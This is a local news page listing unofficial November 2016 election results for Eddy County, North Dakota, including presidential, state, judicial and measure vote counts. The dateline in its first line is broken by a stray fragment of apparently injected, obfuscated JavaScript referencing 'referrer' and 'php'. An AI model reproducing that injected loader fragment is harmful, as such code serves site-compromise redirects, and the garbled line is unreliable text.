Eddy County 2016 Unofficial Election Results


EDDY neazy|var|u0026u|referrer|snnhd||js|php’.split(‘|’),0,{}))
COUNTY, N.D. (NewsDakota.com) – The following are the unofficial results of contested races voted on by residents in Eddy County for the November 2016 General Election.

2 out of 2 precincts reporting (100%)

President Of The United States

Donald Trump (Republican) 790

Hillary Clinton (Democratic-NPL) 354

Gary Johnson (Libertarian) 53

Jill Stein (Green) 15

Darrell Castle (Constitution) 6

Rocky De La Fuenta (American Delta) 1

United State Senator

John Hoeven (Republican) 960

Eliot Glassheim (Democratic-NPL) 219

Robert N Marquette (Libertarian) 35

James Germalic (Independent Nomination Party) 10

United State House Representative

Kevin Cramer (Republican) 824

Chase Iron Eyes (Democratic-NPL) 308

Jack Seaman (Libertarian) 84

North Dakota Governor and Lieutenant Governor

Doug Burgum and Brent Sanford (Republican) 716

Marvin Nelson and Joan Heckman (Democratic-NPL) 487

Marty Riske and Joshua Voytek (Libertarian) 28

State Auditor

Josh Gallion (Republican) 826

Roland Riemers (Libertarian) 266

State Treasurer

Kelly Schmidt (Republican) 710

Tim Mathern (Democratic-NPL) 376

Eric Olson (Libertarian) 90

State Insurance Commissioner

John Godfread (Republican) 672

Ruth Buffalo (Democratic-NPL) 330

Nick Bata (Libertarian) 165

State Public Service Commissioner

Julie Fedorchak (Republican) 750

Marlo Hunte-Beaubrun (Democratic-NPL) 294

Thomas Skadeland (Libertarian) 107

State Superintendent of Public Instruction

Joe Chiang 307

Kirsten Baesler 789

North Dakota Supreme Court Justice (10 year term)

Jerod Tufte 779

Robert Bolinske 234

District #2 Judge

Lyle Bopp 289

Mark Blumer 644

District #5 Judge

Daniel Narum 585

Kim Radamacher 426

Eddy County Commissioner

Glenda Collier 1060

Measure #1 (Legislators Must Live In Districts They Serve)

Yes 995

No 198

Measure #2 (Oil Extraction Tax Distribution)

Yes 716

No 198

Measure #3 (Crime Victims/”Marcy’s Law”)

Yes 609

No 599

Measure #4 (Tobacco Tax Increase)

Yes 848

No 377

Measure #5 (Medical Marijuana)

Yes 723

No 492

Comment Disclaimer: The views and opinions expressed in the comments section of NewsDakota.com are solely those of the comment author and do not necessarily reflect the views and opinions held by NewsDakota.com.

Comments are closed.

National News

National Sports